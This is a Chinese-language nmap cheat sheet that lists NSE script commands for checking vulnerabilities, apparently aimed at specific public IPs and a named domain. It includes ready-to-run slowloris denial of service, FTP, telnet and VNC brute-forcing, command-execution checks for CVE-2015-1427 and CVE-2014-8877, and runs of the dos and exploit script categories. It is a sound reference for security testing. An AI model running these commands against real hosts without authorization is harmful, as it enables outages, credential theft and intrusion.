天天看点

使用nmap验证多种漏洞nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:nmap --sC 203.195.139.153

1、http 拒绝服务

nmap --max-parallelism 800--script http-slowloris scanme.nmap.org

2、IIS 短文件泄露

nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176

3、ftp弱口令暴力破解

nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153

4、检测CVE-2011-2523中的ftp-vsftpd-backdoor

nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240

5、验证http中开启的-methods 方法

nmap -T3 --script http-methods --script-args http.test-all=true,http.url-path=/www.haoshangjia.com

6、验证HTTP.sys 远程代码执行

nmap -sV --script http-vuln-cve2015-1635 203.195.139.153

7、验证 SSL POODLE information leak

nmap -sV -p 443 --version-light --script ssl-poodle 218.19.141.16

8、验证http 中开启了put 方法

nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16

9、验证mysql 匿名访问

nmap --script mysql-empty-password 203.195.139.153

10、验证cve2015-1427 漏洞

nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153

11、验证cve2014-8877漏洞

nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128

12、验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞

nmap -p 443 --script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153

13、验证低安全的 SSHv1,sslv2协议

nmap --script sshv1,sslv2 www.haoshangjia.com

14、 验证CVE-2014-0224 ssl-ccs-injection

nmap -Pn --script ssl-ccs-injection 203.195.139.153

15 、验证ssl-cert证书问题

nmap -v -v --script ssl-cert 203.195.139.153

16、验证SSL证书的有限期

nmap -Pn --script ssl-date www.haoshangjia.com

17、验证CVE-2014-0160 OpenSSL Heartbleed bug

nmap -p 443 --script ssl-heartbleed,ssl-known-key 203.195.139.153

18、验证 Debian OpenSSL keys

nmap -p 443 --script ssl-known-key 203.195.139.153

19、 验证弱加密SSL套件

nmap --script ssl-enum-ciphers 203.195.139.153

20、验证CVE 2015-4000

nmap --script ssl-dh-params www.haoshangjia.com

21、验证多种SSL漏洞问题

nmap 203.195.139.153 --vv --script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2

22、在网络中检测某主机是否存在窃听他人流量

nmap --script sniffer-detect 10.10.167.5

23、暴力破解telnet

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 203.195.139.153

24、验证telnet是否支持加密

nmap --script telnet-encryption 203.195.139.153

25、精准地确认端口上运行的服务

nmap -sV --script unusual-port 42.96.170.128

26、收集VNC信息

nmap --script vnc-info 203.195.139.153

27、暴力破解VNC

nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128

使用系列的nmap NSE 进行检查

nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:

auth: 负责处理鉴权证书(绕开鉴权)的脚本

broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务

brute: 提供暴力破解方式,针对常见的应用如http/snmp等

default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力

discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等

dos: 用于进行拒绝服务攻击

exploit: 利用已知的漏洞入侵系统

external: 利用第三方的数据库或资源,例如进行whois解析

fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞

intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽

malware: 探测目标机是否感染了病毒、开启了后门等信息

safe: 此类与intrusive相反,属于安全性脚本

version: 负责增强服务与版本扫描(Version Detection)功能的脚本

vuln: 负责检查目标机是否有常见的漏洞(Vulnerability)

Nmap提供的脚本命令行参数如下:

-sC: 等价于--script=default,使用默认类别的脚本进行扫描。

--script=: 使用某个或某类脚本进行扫描,支持通配符描述

--script-args=: 为脚本提供默认参数

--script-args-file=filename: 使用文件来为脚本提供参数

--script-trace: 显示脚本执行过程中发送与接收的数据

--script-updatedb: 更新脚本数据库

--script-help=: 显示脚本的帮助信息,其中部分可以逗号分隔的文件或脚本类别。

1、使用nmap对某主机进行一系列的证书鉴权检查

nmap --script auth 203.195.139.153

2、使用nmap在局域网内探查更多服务开启情况

nmap --script broadcast 10.10.167.6

3、使用nmap 对常见的服务进行暴力破解

nmap --script brute 203.195.139.153

4、使用nmap 进行基本的扫描

nmap --script default 203.195.139.153

nmap --sC 203.195.139.153

5、使用nmap 进行信息挖掘

nmap --script discovery 203.195.139.153

6、使用nmap 进行拒绝服务攻击

nmap --script dos 203.195.139.153

7、使用nmap 利用已知的漏洞入侵系统

nmap --script exploit 203.195.139.153

8、使用nmap 进行利用第三方的数据库或资源进行信息收集或者攻击

nmap --script external 203.195.139.153

9、使用nmap 进行模糊测试,发送异常的包到目标机,探测出潜在漏洞

nmap --script fuzzer 203.195.139.153

10、使用nmap 进行入侵,此类脚本可能引发对方的IDS/IPS的记录或屏蔽

nmap --script intrusive 203.195.139.153

11、使用nmap 探测目标机是否感染了病毒、开启了后门等信息

nmap --script malware 203.195.139.153

12、使用nmap 对系统进行安全检查

nmap --script safe 203.195.139.153

13、使用nmap 对目标机进行检查是否存在常见的漏洞

nmap --script vuln 203.195.139.153

14、使用nmap 负责增强服务与版本扫描(Version Detection)功能的脚本

nmap --script version 203.195.139.153